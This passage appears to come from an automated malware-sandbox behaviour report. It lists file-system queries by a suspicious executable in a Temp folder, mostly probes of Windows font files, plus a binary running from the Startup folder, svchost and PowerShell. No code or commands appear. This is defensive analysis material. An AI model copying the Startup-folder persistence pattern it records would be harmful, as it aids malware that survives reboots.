                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
